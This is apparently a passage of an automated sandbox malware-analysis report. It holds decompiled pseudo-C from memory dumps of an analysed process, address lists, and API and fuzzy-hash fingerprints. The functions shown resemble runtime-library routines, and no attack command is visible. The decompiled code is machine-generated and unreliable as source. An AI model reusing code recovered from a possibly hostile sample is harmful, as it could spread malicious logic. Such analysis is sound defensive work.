                                                                                                                            				 *(_t535 + 0x54) = _t453 + 0x341041fd2;
                                                                                                                            				goto 0xf8a7c942;
                                                                                                                            				if (r15b == 0x20) goto 0xf8a7caf2;
                                                                                                                            				if (r15b == 0x23) goto 0xf8a7cae8;
                                                                                                                            				if (r15b == 0x2b) goto 0xf8a7cadf;
                                                                                                                            				if (r15b == 0x2d) goto 0xf8a7cad6;
                                                                                                                            				if (r15b != 0x30) goto 0xf8a7c942;
                                                                                                                            				r14d = r14d | 0x00000008;
                                                                                                                            				goto 0xf8a7c942;
                                                                                                                            				r14d = r14d | 0x00000004;
                                                                                                                            				goto 0xf8a7c942;
                                                                                                                            				r14d = r14d | 0x00000001;
                                                                                                                            				goto 0xf8a7c942;
                                                                                                                            				asm("inc ecx");
                                                                                                                            				goto 0xf8a7c942;
                                                                                                                            				r14d = r14d | 0x00000002;
                                                                                                                            				goto 0xf8a7c942;
                                                                                                                            				 *(_t535 + 0x78) = r10d;
                                                                                                                            				 *(_t535 + 0x5c) = r10d;
                                                                                                                            				 *(_t535 + 0x54) = r10d;
                                                                                                                            				 *(_t535 + 0x48) = r10d;
                                                                                                                            				r14d = r10d;
                                                                                                                            				r12d = r8d;
                                                                                                                            				 *(_t535 + 0x50) = r10d;
                                                                                                                            				goto 0xf8a7c942;
                                                                                                                            				_t263 = E0000025B25BF8A7B89C(_t453);
                                                                                                                            				 *_t453 = 0x16;
                                                                                                                            				E0000025B25BF8A7BEC4(_t263);
                                                                                                                            				r10d = 0;
                                                                                                                            				goto 0xf8a7cb39;
                                                                                                                            				if ( *((intOrPtr*)(_t532 - 0x40)) == r10b) goto 0xf8a7cb4a;
                                                                                                                            				 *( *((intOrPtr*)(_t532 - 0x48)) + 0xc8) =  *( *((intOrPtr*)(_t532 - 0x48)) + 0xc8) & 0xfffffffd;
                                                                                                                            				return E0000025B25BF8A81A50(_t453 + _t453 * 4, _t469,  *(_t532 + 0x1d8) ^ _t535,  *((intOrPtr*)(_t535 + 0x68)),  &(_t524[0]), _t529, _t532, _t571);
                                                                                                                            			}

                                                                                                                            0x25bf8a7c332
                                                                                                                            0x25bf8a7c335
                                                                                                                            0x25bf8a7c33b
                                                                                                                            0x25bf8a7c344
                                                                                                                            0x25bf8a7c34d
                                                                                                                            0x25bf8a7c35b
                                                                                                                            0x25bf8a7c364
                                                                                                                            0x25bf8a7c369
                                                                                                                            0x25bf8a7c372
                                                                                                                            0x25bf8a7c377
                                                                                                                            0x25bf8a7c380
                                                                                                                            0x25bf8a7c386
                                                                                                                            0x25bf8a7c38b
                                                                                                                            0x25bf8a7c38f
                                                                                                                            0x25bf8a7c396
                                                                                                                            0x25bf8a7c39c
                                                                                                                            0x25bf8a7c39f
                                                                                                                            0x25bf8a7c3a4
                                                                                                                            0x25bf8a7c3a9
                                                                                                                            0x25bf8a7c3ab
                                                                                                                            0x25bf8a7c3ac
                                                                                                                            0x25bf8a7c3b8
                                                                                                                            0x25bf8a7c3bd
                                                                                                                            0x25bf8a7c3c2
                                                                                                                            0x25bf8a7c3ce
                                                                                                                            0x25bf8a7c3da
                                                                                                                            0x25bf8a7c3dc
                                                                                                                            0x25bf8a7c3e1
                                                                                                                            0x25bf8a7c3f0
                                                                                                                            0x25bf8a7c3fe
                                                                                                                            0x25bf8a7c407
                                                                                                                            0x25bf8a7c40f
                                                                                                                            0x25bf8a7c417
                                                                                                                            0x25bf8a7c41a
                                                                                                                            0x25bf8a7c426
                                                                                                                            0x25bf8a7c428
                                                                                                                            0x25bf8a7c42d
                                                                                                                            0x25bf8a7c438
                                                                                                                            0x25bf8a7c43a
                                                                                                                            0x25bf8a7c43f
                                                                                                                            0x25bf8a7c443
                                                                                                                            0x25bf8a7c44b
                                                                                                                            0x25bf8a7c450
                                                                                                                            0x25bf8a7c455
                                                                                                                            0x25bf8a7c457
                                                                                                                            0x25bf8a7c45f
                                                                                                                            0x25bf8a7c465
                                                                                                                            0x25bf8a7c46d
                                                                                                                            0x25bf8a7c474
                                                                                                                            0x25bf8a7c479
                                                                                                                            0x25bf8a7c481
                                                                                                                            0x25bf8a7c485
                                                                                                                            0x25bf8a7c489
                                                                                                                            0x25bf8a7c48d
                                                                                                                            0x25bf8a7c493
                                                                                                                            0x25bf8a7c499
                                                                                                                            0x25bf8a7c49f
                                                                                                                            0x25bf8a7c4a7
                                                                                                                            0x25bf8a7c4b0
                                                                                                                            0x25bf8a7c4b5
                                                                                                                            0x25bf8a7c4be
                                                                                                                            0x25bf8a7c4c7
                                                                                                                            0x25bf8a7c4d0
                                                                                                                            0x25bf8a7c4d5
                                                                                                                            0x25bf8a7c4de
                                                                                                                            0x25bf8a7c4e7
                                                                                                                            0x25bf8a7c4f0
                                                                                                                            0x25bf8a7c4f2
                                                                                                                            0x25bf8a7c4f8
                                                                                                                            0x25bf8a7c500
                                                                                                                            0x25bf8a7c508
                                                                                                                            0x25bf8a7c50d
                                                                                                                            0x25bf8a7c515
                                                                                                                            0x25bf8a7c518
                                                                                                                            0x25bf8a7c51f
                                                                                                                            0x25bf8a7c526
                                                                                                                            0x25bf8a7c52a
                                                                                                                            0x25bf8a7c52e
                                                                                                                            0x25bf8a7c533
                                                                                                                            0x25bf8a7c539
                                                                                                                            0x25bf8a7c543
                                                                                                                            0x25bf8a7c547
                                                                                                                            0x25bf8a7c550
                                                                                                                            0x25bf8a7c554
                                                                                                                            0x25bf8a7c55d
                                                                                                                            0x25bf8a7c561
                                                                                                                            0x25bf8a7c563
                                                                                                                            0x25bf8a7c56c
                                                                                                                            0x25bf8a7c56e
                                                                                                                            0x25bf8a7c571
                                                                                                                            0x25bf8a7c573
                                                                                                                            0x25bf8a7c57b
                                                                                                                            0x25bf8a7c580
                                                                                                                            0x25bf8a7c585
                                                                                                                            0x25bf8a7c58f
                                                                                                                            0x25bf8a7c591
                                                                                                                            0x25bf8a7c594
                                                                                                                            0x25bf8a7c596
                                                                                                                            0x25bf8a7c598
                                                                                                                            0x25bf8a7c5a0
                                                                                                                            0x25bf8a7c5a5
                                                                                                                            0x25bf8a7c5a9
                                                                                                                            0x25bf8a7c5b8
                                                                                                                            0x25bf8a7c5bb
                                                                                                                            0x25bf8a7c5c5
                                                                                                                            0x25bf8a7c5c7
                                                                                                                            0x25bf8a7c5cc
                                                                                                                            0x25bf8a7c5ce
                                                                                                                            0x25bf8a7c5d6
                                                                                                                            0x25bf8a7c5d8
                                                                                                                            0x25bf8a7c5e1
                                                                                                                            0x25bf8a7c5e8
                                                                                                                            0x25bf8a7c5ea
                                                                                                                            0x25bf8a7c5ef
                                                                                                                            0x25bf8a7c5f5
                                                                                                                            0x25bf8a7c5f7
                                                                                                                            0x25bf8a7c5fb
                                                                                                                            0x25bf8a7c5fd
                                                                                                                            0x25bf8a7c601
                                                                                                                            0x25bf8a7c60a
                                                                                                                            0x25bf8a7c60f
                                                                                                                            0x25bf8a7c614
                                                                                                                            0x25bf8a7c619
                                                                                                                            0x25bf8a7c61c
                                                                                                                            0x25bf8a7c61e
                                                                                                                            0x25bf8a7c623
                                                                                                                            0x25bf8a7c62b
                                                                                                                            0x25bf8a7c62d
                                                                                                                            0x25bf8a7c633
                                                                                                                            0x25bf8a7c635
                                                                                                                            0x25bf8a7c63c
                                                                                                                            0x25bf8a7c640
                                                                                                                            0x25bf8a7c648
                                                                                                                            0x25bf8a7c652
                                                                                                                            0x25bf8a7c656
                                                                                                                            0x25bf8a7c65d
                                                                                                                            0x25bf8a7c662
                                                                                                                            0x25bf8a7c667
                                                                                                                            0x25bf8a7c677
                                                                                                                            0x25bf8a7c677
                                                                                                                            0x25bf8a7c67d
                                                                                                                            0x25bf8a7c67f
                                                                                                                            0x25bf8a7c682
                                                                                                                            0x25bf8a7c687
                                                                                                                            0x25bf8a7c689
                                                                                                                            0x25bf8a7c68e
                                                                                                                            0x25bf8a7c695
                                                                                                                            0x25bf8a7c697
                                                                                                                            0x25bf8a7c69a
                                                                                                                            0x25bf8a7c6a1
                                                                                                                            0x25bf8a7c6a9
                                                                                                                            0x25bf8a7c6ab
                                                                                                                            0x25bf8a7c6ae
                                                                                                                            0x25bf8a7c6b7
                                                                                                                            0x25bf8a7c6bb
                                                                                                                            0x25bf8a7c6be
                                                                                                                            0x25bf8a7c6c3
                                                                                                                            0x25bf8a7c6c9
                                                                                                                            0x25bf8a7c6cb
                                                                                                                            0x25bf8a7c6d1
                                                                                                                            0x25bf8a7c6d6
                                                                                                                            0x25bf8a7c6e1
                                                                                                                            0x25bf8a7c6e3
                                                                                                                            0x25bf8a7c6ee
                                                                                                                            0x25bf8a7c6f3
                                                                                                                            0x25bf8a7c6f7
                                                                                                                            0x25bf8a7c6fa
                                                                                                                            0x25bf8a7c6fc
                                                                                                                            0x25bf8a7c701
                                                                                                                            0x25bf8a7c703
                                                                                                                            0x25bf8a7c709
                                                                                                                            0x25bf8a7c714
                                                                                                                            0x25bf8a7c71c
                                                                                                                            0x25bf8a7c71f
                                                                                                                            0x25bf8a7c723
                                                                                                                            0x25bf8a7c72d
                                                                                                                            0x25bf8a7c730
                                                                                                                            0x25bf8a7c73c
                                                                                                                            0x25bf8a7c747
                                                                                                                            0x25bf8a7c74c
                                                                                                                            0x25bf8a7c757
                                                                                                                            0x25bf8a7c75c
                                                                                                                            0x25bf8a7c765
                                                                                                                            0x25bf8a7c772
                                                                                                                            0x25bf8a7c778
                                                                                                                            0x25bf8a7c77c
                                                                                                                            0x25bf8a7c785
                                                                                                                            0x25bf8a7c792
                                                                                                                            0x25bf8a7c797
                                                                                                                            0x25bf8a7c799
                                                                                                                            0x25bf8a7c79e
                                                                                                                            0x25bf8a7c7a4
                                                                                                                            0x25bf8a7c7a9
                                                                                                                            0x25bf8a7c7ac
                                                                                                                            0x25bf8a7c7b5
                                                                                                                            0x25bf8a7c7bb
                                                                                                                            0x25bf8a7c7bf
                                                                                                                            0x25bf8a7c7c1
                                                                                                                            0x25bf8a7c7c6
                                                                                                                            0x25bf8a7c7c8
                                                                                                                            0x25bf8a7c7cd
                                                                                                                            0x25bf8a7c7d3

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno$Locale_invalid_parameter_noinfo$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexitwrite_multi_charwrite_string
                                                                                                                            • String ID: -
                                                                                                                            • API String ID: 3246410048-2547889144
                                                                                                                            • Opcode ID: 028f1f1eae3374fd4aa8a94153580cfdd1fd6873e23f0f77f775f212f8225329
                                                                                                                            • Instruction ID: ab237c3b9c4ef7288d74e693cc4a79feb4ae9dba6d1c6ab54efa7361301ab7d0
                                                                                                                            • Opcode Fuzzy Hash: 028f1f1eae3374fd4aa8a94153580cfdd1fd6873e23f0f77f775f212f8225329
                                                                                                                            • Instruction Fuzzy Hash: 87B1F433604E8086FF66CB659C483AE6BA0F7817B6F341116FE4907ED9DB38C9419768
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 388111225-0
                                                                                                                            • Opcode ID: 2ece736ccf34be7b8f844ccbcf1398da1420c8e9a36c9c48ef6cfb0a1ee02dda
                                                                                                                            • Instruction ID: 9b17dfb926ff60d5150a808dd1c0ed710c5db08e20a48c4bc6f0677008895dce
                                                                                                                            • Opcode Fuzzy Hash: 2ece736ccf34be7b8f844ccbcf1398da1420c8e9a36c9c48ef6cfb0a1ee02dda
                                                                                                                            • Instruction Fuzzy Hash: B731A133608B054EEB1B6F689C8A3B97691EB42331F254659F412CB6E3D77498018A69
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: free$BoundaryDeleteDescriptor_errno
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3555341564-0
                                                                                                                            • Opcode ID: a1abfc4af50810227ff6ca1c989a2150589366c2bf99d4b18f04ac51b81b0102
                                                                                                                            • Instruction ID: f9c1f57c0756ece768d19a0f6925546ac72b33c69be0c58fd7ee3cfcabc85801
                                                                                                                            • Opcode Fuzzy Hash: a1abfc4af50810227ff6ca1c989a2150589366c2bf99d4b18f04ac51b81b0102
                                                                                                                            • Instruction Fuzzy Hash: 8931DD73118C045FEE99FB64DCDDBA83791EB15312F648444F91ACB992CB34A851D734
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: free$_errno
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2288870239-0
                                                                                                                            • Opcode ID: d059cf2b497bb07b6b9f35adf6d66a7cdc87e1c1edd293a69e655e874bacf2fe
                                                                                                                            • Instruction ID: 33e70569f1a77b1d914c269e9a50b027e350dd6ff76c694a044eef2e7695e522
                                                                                                                            • Opcode Fuzzy Hash: d059cf2b497bb07b6b9f35adf6d66a7cdc87e1c1edd293a69e655e874bacf2fe
                                                                                                                            • Instruction Fuzzy Hash: AF31E163215C0591FE53EB61EC9D3BC1364E780766FA80006BA1E57D95CF39C8C59379
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock_unlock_fhandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2644381645-0
                                                                                                                            • Opcode ID: 92b0c9998a49a1ff066f8d0d4c609502185e615d9af7485e153b0ca049bbbe44
                                                                                                                            • Instruction ID: 9f8c27b74499516295cd6a7e4e4fad6603c35e8a2c10f0e7c5787c679943c95a
                                                                                                                            • Opcode Fuzzy Hash: 92b0c9998a49a1ff066f8d0d4c609502185e615d9af7485e153b0ca049bbbe44
                                                                                                                            • Instruction Fuzzy Hash: F5210533608E004EFB166B68DC5E7B972D1EB86332F250249F456C75E7D7746841827D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock_unlock_fhandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1078912150-0
                                                                                                                            • Opcode ID: d2931e0a4805d45a47c3ca51ec169f0001f81ffbaadf8b9bf75f2cd77fe7735a
                                                                                                                            • Instruction ID: b27de1472f54399cafc86895a6ea17bda0033b3f75e71c5d54549ffa0f3407fe
                                                                                                                            • Opcode Fuzzy Hash: d2931e0a4805d45a47c3ca51ec169f0001f81ffbaadf8b9bf75f2cd77fe7735a
                                                                                                                            • Instruction Fuzzy Hash: 0821F733A08A004EFB166B68DC4E3BD7691EB86332F254618F456C75E7D774A841827E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 54%
                                                                                                                            			E0000025B25BF8A80A4C(signed int __ecx, void* __edx, signed int __edi, signed int __esi, signed int* __rax, long long __rbx, long long __rdx, long long __rsi, signed int _a8, long long _a16, long long _a24) {
                                                                                                                            				void* __rdi;
                                                                                                                            				void* _t30;
                                                                                                                            				signed int _t35;
                                                                                                                            				void* _t49;
                                                                                                                            				intOrPtr* _t55;
                                                                                                                            				signed int* _t56;
                                                                                                                            				signed long long _t64;
                                                                                                                            				signed long long _t72;
                                                                                                                            
                                                                                                                            				_a16 = __rbx;
                                                                                                                            				_a24 = __rsi;
                                                                                                                            				_a8 = __ecx;
                                                                                                                            				r14d = r8d;
                                                                                                                            				if (__edi != 0xfffffffe) goto 0xf8a80a8e;
                                                                                                                            				E0000025B25BF8A7B82C(__rax);
                                                                                                                            				 *__rax = 0;
                                                                                                                            				E0000025B25BF8A7B89C(__rax);
                                                                                                                            				 *__rax = 9;
                                                                                                                            				goto 0xf8a80b4b;
                                                                                                                            				if (__ecx < 0) goto 0xf8a80b34;
                                                                                                                            				_t49 = __edi -  *0xf8aa7384;
                                                                                                                            				if (_t49 >= 0) goto 0xf8a80b34;
                                                                                                                            				_t72 = __ecx >> 5;
                                                                                                                            				_t64 = __ecx * 0x58;
                                                                                                                            				_t55 =  *((intOrPtr*)(0xf8aa3200 + _t72 * 8));
                                                                                                                            				if (_t49 == 0) goto 0xf8a80b34;
                                                                                                                            				if ((0 | r8d - 0x7fffffff < 0x00000000) != 0) goto 0xf8a80aef;
                                                                                                                            				E0000025B25BF8A7B82C(_t55);
                                                                                                                            				 *_t55 = 0;
                                                                                                                            				E0000025B25BF8A7B89C(_t55);
                                                                                                                            				 *_t55 = 0x16;
                                                                                                                            				goto 0xf8a80b46;
                                                                                                                            				E0000025B25BF8A83FA8(0, __edi, __rbx, __ecx, _t64);
                                                                                                                            				_t56 =  *((intOrPtr*)(0xf8aa3200 + _t72 * 8));
                                                                                                                            				if (( *(_t56 + _t64 + 8) & 0x00000001) == 0) goto 0xf8a80b14;
                                                                                                                            				r8d = r14d;
                                                                                                                            				_t35 = E0000025B25BF8A80B68(__edi, __esi & 0x0000001f, _t56, __rdx);
                                                                                                                            				goto 0xf8a80b29;
                                                                                                                            				E0000025B25BF8A7B89C(_t56);
                                                                                                                            				 *_t56 = 9;
                                                                                                                            				E0000025B25BF8A7B82C(_t56);
                                                                                                                            				 *_t56 = _t35;
                                                                                                                            				0xf8a84408();
                                                                                                                            				goto 0xf8a80b4e;
                                                                                                                            				E0000025B25BF8A7B82C(_t56);
                                                                                                                            				 *_t56 = _t35 | 0xffffffff;
                                                                                                                            				_t30 = E0000025B25BF8A7B89C(_t56);
                                                                                                                            				 *_t56 = 9;
                                                                                                                            				return E0000025B25BF8A7BEC4(_t30) | 0xffffffff;
                                                                                                                            			}












                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 388111225-0
                                                                                                                            • Opcode ID: 84aafaf433f9753625a7bf88cfaeb6d151adc82864f8d1a7e0c022a9c9f96788
                                                                                                                            • Instruction ID: 1d0028082928118a621fdc66ccc9f2981bc1e5f400276945f29671d2e01419f1
                                                                                                                            • Opcode Fuzzy Hash: 84aafaf433f9753625a7bf88cfaeb6d151adc82864f8d1a7e0c022a9c9f96788
                                                                                                                            • Instruction Fuzzy Hash: BB317C73600A408AFF176F65AC8936D6A50EB807B6F654614FA2507FD2C77888529B3C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 66%
                                                                                                                            			E01313F80(void* __eax, void* __esp, long long __rax, signed long long __rbx, long long __rcx, long long __rdi, long long __rbp, signed long long __r9, void* __r14, long long _a8, signed long long _a16, long long _a24, long long _a32) {
                                                                                                                            				char _v8;
                                                                                                                            				long long _v16;
                                                                                                                            				long long _v24;
                                                                                                                            				signed long long _v32;
                                                                                                                            				long long _v40;
                                                                                                                            				long long _v48;
                                                                                                                            				char _v56;
                                                                                                                            				long long _v64;
                                                                                                                            				char _v72;
                                                                                                                            				long long _v80;
                                                                                                                            				long long _v88;
                                                                                                                            				long long _v96;
                                                                                                                            				long long _v104;
                                                                                                                            				signed long long _v112;
                                                                                                                            				long long _v120;
                                                                                                                            				long long _v200;
                                                                                                                            				void* _t122;
                                                                                                                            				void* _t146;
                                                                                                                            				void* _t147;
                                                                                                                            				signed int _t152;
                                                                                                                            				signed int _t156;
                                                                                                                            				signed int _t158;
                                                                                                                            				void* _t169;
                                                                                                                            				void* _t171;
                                                                                                                            				void* _t172;
                                                                                                                            				void* _t189;
                                                                                                                            				long long _t192;
                                                                                                                            				long long _t194;
                                                                                                                            				long long _t198;
                                                                                                                            				intOrPtr _t199;
                                                                                                                            				intOrPtr _t212;
                                                                                                                            				intOrPtr _t213;
                                                                                                                            				intOrPtr _t214;
                                                                                                                            				signed long long _t215;
                                                                                                                            				signed long long _t218;
                                                                                                                            				long long _t219;
                                                                                                                            				void* _t223;
                                                                                                                            				long long _t224;
                                                                                                                            				void* _t227;
                                                                                                                            				intOrPtr _t228;
                                                                                                                            				signed long long _t232;
                                                                                                                            				signed long long _t233;
                                                                                                                            				signed long long _t234;
                                                                                                                            				long long _t236;
                                                                                                                            				void* _t238;
                                                                                                                            				long long* _t241;
                                                                                                                            				void* _t248;
                                                                                                                            				long long* _t249;
                                                                                                                            				intOrPtr* _t257;
                                                                                                                            				signed long long _t258;
                                                                                                                            				void* _t259;
                                                                                                                            				void* _t263;
                                                                                                                            				signed long long _t264;
                                                                                                                            				signed long long _t265;
                                                                                                                            				signed long long _t266;
                                                                                                                            				void* _t268;
                                                                                                                            				void* _t269;
                                                                                                                            				void* _t274;
                                                                                                                            
                                                                                                                            				L0:
                                                                                                                            				while(1) {
                                                                                                                            					L0:
                                                                                                                            					_t269 = __r14;
                                                                                                                            					_t258 = __r9;
                                                                                                                            					_t242 = __rbp;
                                                                                                                            					_t229 = __rdi;
                                                                                                                            					_t219 = __rcx;
                                                                                                                            					_t215 = __rbx;
                                                                                                                            					_t190 = __rax;
                                                                                                                            					_t172 = __esp;
                                                                                                                            					_t114 = __eax;
                                                                                                                            					if( &_v80 <=  *((intOrPtr*)(__r14 + 0x10))) {
                                                                                                                            						goto L70;
                                                                                                                            					}
                                                                                                                            					L1:
                                                                                                                            					_t249 = _t248 - 0xd0;
                                                                                                                            					_v8 = __rbp;
                                                                                                                            					_t242 =  &_v8;
                                                                                                                            					_a8 = __rax;
                                                                                                                            					_a16 = __rbx;
                                                                                                                            					_a24 = __rcx;
                                                                                                                            					_a32 = __rdi;
                                                                                                                            					if( *0x14cf7cc != 0) {
                                                                                                                            						L41:
                                                                                                                            						return __eax;
                                                                                                                            					} else {
                                                                                                                            						L2:
                                                                                                                            						_t192 = _a8;
                                                                                                                            						if(_t192 == 0) {
                                                                                                                            							L69:
                                                                                                                            							_t190 = 0x138dd67;
                                                                                                                            							E01330BA0(0x138dd67, _t215, _t242);
                                                                                                                            							goto L70;
                                                                                                                            						} else {
                                                                                                                            							L3:
                                                                                                                            							_t162 =  *(_t192 + 0x17) & 0x1f;
                                                                                                                            							if(( *(_t192 + 0x17) & 0x1f) != 0x16) {
                                                                                                                            								L68:
                                                                                                                            								E013513C0(_t156, _t167, _t169, _t172, _t192, _t215, _t229, _t242, _t255, _t269);
                                                                                                                            								_t229 = _t192;
                                                                                                                            								_t232 = _t215;
                                                                                                                            								r9d = 0xd;
                                                                                                                            								_t215 = 0x138d80a;
                                                                                                                            								E01345EA0(0xe, _t172, _t192, 0x138d80a, _t219, _t229, _t232, _t242, 0x1387e87, _t258, _t268, _t269);
                                                                                                                            								E01330BA0(_t192, 0x138d80a, _t242);
                                                                                                                            								goto L69;
                                                                                                                            							} else {
                                                                                                                            								L4:
                                                                                                                            								if( *((long long*)(_t192 + 0x30)) == 0) {
                                                                                                                            									L67:
                                                                                                                            									_t192 = 0x13882a4;
                                                                                                                            									E01330BA0(0x13882a4, _t215, _t242);
                                                                                                                            									goto L68;
                                                                                                                            								} else {
                                                                                                                            									L5:
                                                                                                                            									_v88 = _t192;
                                                                                                                            									_t152 = 0;
                                                                                                                            									E0130F560(__rbx,  &_v8);
                                                                                                                            									if(__rbx != 0) {
                                                                                                                            										L9:
                                                                                                                            										_t222 = _a16;
                                                                                                                            										_t224 = _t222;
                                                                                                                            										if(__rbx == _t222) {
                                                                                                                            											L14:
                                                                                                                            											_t194 = _v88;
                                                                                                                            											goto L15;
                                                                                                                            										} else {
                                                                                                                            											L10:
                                                                                                                            											_t194 = _v88;
                                                                                                                            											_t241 =  *((intOrPtr*)(_t194 + 0x30));
                                                                                                                            											if(_t241 == 0 ||  *((long long*)(_t241 + 8)) != 0) {
                                                                                                                            												L53:
                                                                                                                            												_t199 = 0x138f011;
                                                                                                                            												_t114 = E01330BA0(0x138f011, _t215, _t242);
                                                                                                                            												goto L54;
                                                                                                                            											} else {
                                                                                                                            												L12:
                                                                                                                            												if( *_t241 < 0x10) {
                                                                                                                            													L15:
                                                                                                                            													_t233 = _a24;
                                                                                                                            													if(_t233 == 0) {
                                                                                                                            														L40:
                                                                                                                            														asm("inc esp");
                                                                                                                            														_v72 = E01314640;
                                                                                                                            														_v64 =  &_a8;
                                                                                                                            														 *_t249 =  &_v72;
                                                                                                                            														_t122 = E013560C0(_t152, _t156, _t162, _t167, _t169, _t171, _t172, _t189, _t242, _t259, _t263, _t268, _t269, _t274);
                                                                                                                            														asm("inc ebp");
                                                                                                                            														return _t122;
                                                                                                                            													} else {
                                                                                                                            														L16:
                                                                                                                            														_t167 =  *(_t233 + 0x17) & 0x1f;
                                                                                                                            														if(dil != 0x13) {
                                                                                                                            															L52:
                                                                                                                            															_t198 = _t233;
                                                                                                                            															E013513C0(_t156, _t167, _t169, _t172, _t198, _t215, _t229, _t242, _t255, _t269);
                                                                                                                            															_t156 = 0x29;
                                                                                                                            															_t229 = _t198;
                                                                                                                            															_t234 = _t215;
                                                                                                                            															_t255 = 0x13886a0;
                                                                                                                            															r9d = 0x10;
                                                                                                                            															_t215 = 0x138d9c8;
                                                                                                                            															E01345EA0(_t152, _t172, _t198, 0x138d9c8, _t222, _t198, _t234, _t242, 0x13886a0, _t258, _t268, _t269);
                                                                                                                            															E01330BA0(_t198, 0x138d9c8, _t242);
                                                                                                                            															goto L53;
                                                                                                                            														} else {
                                                                                                                            															L17:
                                                                                                                            															_v104 = _t233;
                                                                                                                            															_t167 =  *(_t233 + 0x32) & 0x0000ffff;
                                                                                                                            															asm("o16 nop [eax+eax]");
                                                                                                                            															if(( *(_t233 + 0x32) & 0x8000) != 0) {
                                                                                                                            																L51:
                                                                                                                            																E013513C0(_t156, _t167, _t169, _t172, _t194, _t215, _t229, _t242, _t255, _t269);
                                                                                                                            																_v80 = _t194;
                                                                                                                            																_v112 = _t215;
                                                                                                                            																_t201 = _v104;
                                                                                                                            																E013513C0(_t156, _t167, _t169, _t172, _v104, _t215, _t229, _t242, _t255, _t269);
                                                                                                                            																_t222 = 0x1388d52;
                                                                                                                            																 *_t249 = 0x1388d52;
                                                                                                                            																_v200 = 0x12;
                                                                                                                            																_t156 = 0x22;
                                                                                                                            																_t229 = _v80;
                                                                                                                            																_t233 = _v112;
                                                                                                                            																_t255 = 0x13880c8;
                                                                                                                            																r9d = 0xe;
                                                                                                                            																_t264 = _t215;
                                                                                                                            																_t215 = 0x138ccfa;
                                                                                                                            																E01346080(_t152, _t162, _t172, _v104, 0x138ccfa, 0x1388d52, _v80, _t233, _t242, 0x13880c8, _t258, _t201, _t264, _t268, _t269);
                                                                                                                            																E01330BA0(_t201, 0x138ccfa, _t242);
                                                                                                                            																goto L52;
                                                                                                                            															} else {
                                                                                                                            																L18:
                                                                                                                            																_t158 =  *(_t233 + 0x30) & 0x0000ffff;
                                                                                                                            																if(_t158 != 1) {
                                                                                                                            																	L50:
                                                                                                                            																	E013513C0(_t158, _t167, _t169, _t172, _t194, _t215, _t229, _t242, _t255, _t269);
                                                                                                                            																	_v80 = _t194;
                                                                                                                            																	_v112 = _t215;
                                                                                                                            																	_t194 = _v104;
